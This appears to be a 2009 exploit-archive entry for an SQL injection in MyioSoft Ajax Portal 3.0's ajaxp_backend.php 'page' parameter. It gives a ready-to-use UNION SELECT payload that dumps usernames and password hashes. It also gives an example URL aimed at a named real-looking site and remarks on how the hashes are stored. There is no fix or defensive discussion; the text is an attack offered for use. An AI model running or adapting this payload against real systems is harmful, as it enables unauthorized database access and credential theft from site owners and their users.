[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability
# Published : 2009-04-01
# Author : cOndemned
# Previous Title : GDL 4.x (node) Remote SQL Injection Vulnerability
# Next Title : TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities


AjaxPortal 3.0 (ajaxp_backend.php page) Remote SQL Injection Vulnerability
Bug found && Exploited by cOndemned
Greetz: ZaBeaTy, d2, Beowulf, str0ke, Alfons Luja, 0in and others

Proof of Concept : http://[host]/[ajaxportal-3.0_path]/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+PREFIX_users--

Example : http://calmpc.net/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+dbPfixajaxp_users--


Passwords are encoded using MySQL PASSWORD() function. (used algorithm depends on MySQL version.)


// http://www.youtube.com/watch?v=dX_PLimGeHk&flip=1 :P

# www.Syue.com [2009-04-01]